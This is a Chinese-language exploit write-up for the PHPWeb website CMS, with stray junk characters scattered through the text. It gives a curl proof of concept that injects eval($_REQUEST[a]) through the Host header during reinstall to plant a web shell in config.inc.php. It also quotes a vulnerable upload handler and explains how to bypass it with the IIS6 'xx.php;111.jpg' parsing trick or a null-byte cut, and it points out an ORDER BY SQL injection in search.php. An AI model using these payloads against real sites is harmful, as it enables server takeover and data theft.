phpweb成品网站最新版(注入、上传、写shell)

admin

注入：

+ h* h4 l# z0 ?; B6 S  N0 ]5 Z之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码
4 T3 J7 K  D9 T+ q
: R, d. I# Q# i鸡肋1： 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
鸡肋2： 有一定安全常识的站长都会删掉 install 目录
' g+ e2 F1 c1 }5 N( H/ E
虽然鸡肋 但也有优点 ： 不受 magic_quotes_gpc 、 webserver 影响

6 k* q4 T! a- [8 E" s分析：

+ O" A( Y+ Y3 z
7 B$ e+ Z$ W8 l$siteurl="http://".$_SERVER["HTTP_HOST"]."/";    //未过滤

+ ~6 g" [# |' U: H! ?! I                                            $filestr = fread(fopen($SysConfigFile, 'r'),30000);
                                            $filestr=str_replace(" ","",$filestr);
                                            $filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
( L3 T7 N$ _$ M( x                                            $filestr=str_replace("DefaultDbName",$dbname,$filestr);
! D0 |& s% C, R2 v3 x. _# D                                            $filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
                                            $filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
                                            $filestr=str_replace("DefaultsLan","zh_cn",$filestr);
                                            $filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
) U3 g) a6 m. T' F: n                                            $filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);
) r. A! s2 {$ N% `6 H+ i
7 w' e3 m, _+ e" w( @; ]' }* B" Q                                            fwrite(fopen($ConFile,"w"),$filestr,30000);
' V7 T4 ^# w. {2 a% u$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^

poc：

?
* M3 j$ o3 K" t& {- m1
  }2 |9 ~/ W' K  U# f0 @/ @4 Acurl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
shell地址: /config.inc.php
( C; n* `' K! `2 c跟之前的 phpcms一样 需要远程数据库

$ T6 s7 u% D; |——————————————————–
上传漏洞(需要进后台)：
漏洞文件: /kedit/upload_cgi/upload.php
  I& _* N! u' |这个很多人都知道,但是很鸡肋 iis6 解析 或 GPC off条件下才可利用
  P6 D( o& @+ z# e- G. g6 ?* b
, t* `  ]; `" R5 d
<?php
% h, a* F7 |' p: j    define("ROOTPATH", "../../");
    include(ROOTPATH."includes/admin.inc.php");
! J0 ^1 s1 c4 I4 F8 a; l    NeedAuth(0);
4 M$ U/ V/ z2 V, T, O7 X
2 ]9 s1 F, y* _# R  G/ ~6 R& k$ p( Z    $dt=date("Ymd",time());
    if(!is_dir(ROOTPATH.$_POST['attachPath'].$dt)){
5 Y+ P9 w  k: `3 B            @mkdir(ROOTPATH.$_POST['attachPath'].$dt,0777);
  ~1 f/ D* l' c7 \    }
9 i% z# I  p  e+ d. |
    //文件保存目录路径
    $save_path = ROOTPATH.$_POST['attachPath'].$dt.'/';
    echo $save_path;
    //文件保存目录URL
    $save_url = '../../'.$_POST['attachPath'].$dt.'/';

    //定义允许上传的文件扩展名
    $ext_arr = array('gif','jpg','png','bmp'); //限制后缀
, t. d4 t* i1 Q( }
    //最大文件大小
    $max_size = 1000000;
- @& E- w+ S& ^/ }, F
    //更改目录权限
9 S( [4 |7 I) v    @mkdir($save_path, 0777);

, f; p7 S) c% O) C" s8 I    //文件的全部路径
  ]/ m/ r9 Y0 ?0 M* K    $file_path = $save_path.$_POST['fileName'];   //保存文件名

    //文件URL
8 m( O$ s. F* F( B    $file_url = $save_url.$_POST['fileName'];
% ?8 g6 Z8 y  b& ?' I) \//有上传文件时
    if (empty($_FILES) === false) {
3 c; }' u: G" [2 N9 Q
            //原文件名
# A8 ~2 [6 `0 H& M$ u4 T            $file_name = $_FILES['fileData']['name'];
8 ^: a# |6 X6 p, w# ~8 q+ d            //服务器上临时文件名
  S9 N* p$ {( P5 w' u2 N! j8 N% X            $tmp_name = $_FILES['fileData']['tmp_name'];
            //文件大小
$ z" ?8 I) T: S3 B* O  R% Q1 G0 i            $file_size = $_FILES['fileData']['size'];
            //检查目录
5 u  L8 g2 g$ o0 E9 m( h            if (@is_dir($save_path) === false) {
                    alert("上传目录不存在。");
$ ~4 z6 O  m0 U            }
            //检查目录写权限
            if (@is_writable($save_path) === false) {
. j$ T1 j" S% ]2 v7 _( m  ^$ s                    alert("上传目录没有写权限。");
            }
2 w$ V  q+ W1 r6 c6 p( w- [1 {7 `7 j            //检查是否已上传
8 v" R6 {, s: p" A0 P: L1 f: K( i            if (@is_uploaded_file($tmp_name) === false) {
                    alert("临时文件可能不是上传文件。");
% z0 ~9 l8 ~+ ?+ b3 Z            }
            //检查文件大小
& s/ {- l% g6 I% L4 X" |8 S0 m            if ($file_size > $max_size) {
                    alert("上传文件大小超过限制。");
            }
# F; k  {9 J0 A: @0 K* N0 D            //获得文件扩展名
            $temp_arr = explode(".", $_POST['fileName']);
            $file_ext = array_pop($temp_arr);
            $file_ext = trim($file_ext);
            $file_ext = strtolower($file_ext);
. G2 r: ~. o+ u5 W) Q
6 u( m( [! t  L" `. [# v* K$ q7 |            //检查扩展名   
            if (in_array($file_ext, $ext_arr) === false) {     
# u$ m. i5 _5 `- D5 n1 U                    alert("上传文件扩展名是不允许的扩展名。");
            }

            //移动文件   
            //未重命名 虽然过滤了 后缀   iis 6解析漏洞 ^ _ ^
            if (move_uploaded_file($tmp_name, $file_path) === false) {
/ ^3 s# y3 p$ s5 _3 }                    alert("上传文件失败。");
! G; |! r* l: b            }

            @chmod($file_path,0666);
4 e8 }+ \5 t+ t  Y
( x% y0 s( b$ \7 m% P- J+ }: ~    ?>
抓包改包 filename 改为 xx.php;111.jpg 即可突破或者使用http://www.0day5.com/?p=227
' ?, ~+ f% Z1 X  L# @9 h+ r- S0 T
apache 版本magic_quotes_gpc = off情况下可以考虑 \00 截断 绕过

——————————————————
8 F- P: U& m% p+ ]注入漏洞：
漏洞文件:search/module/search.php
! l8 ]8 g0 t- T6 x& |/search/index.php?key=1&myord=1 [sqlinjection]
) @8 W/ X3 `) Z& [
; Y( c4 Q# {8 N. @3 \& @# n
" f% C  E: V) E( I# g<?php
   //       ... 省略 n 行...
   //第18行:
           $key=htmlspecialchars($_GET["key"]);   //只是简单的将字符HTML 实体 编码   , mysql 注入不受此影响
9 d  ^  x9 g4 N           $page=htmlspecialchars($_GET["page"]);
           $myord=htmlspecialchars($_GET["myord"]);

   //       ... 省略 n 行...
   $key,$myord 两个参数带入查询
2 x3 a5 E/ }7 O   //第47行 $key:

( j, g1 z9 y3 `8 x4 M   $fsql->query("select count(id) from {P}_news_con where iffb='1' and catid!='0' and (title regexp '$key' or body regexp '$key')");  //虽然带入查询 但使用的 是regexp 不知如何绕过..

   //第197行 $myord
: m; o4 a) ?" {" c  t4 p   $fsql->query($scl . " order by $myord desc limit $pagelimit ");    产生注入
- `, S3 D+ B: {! y( v- W
   ?>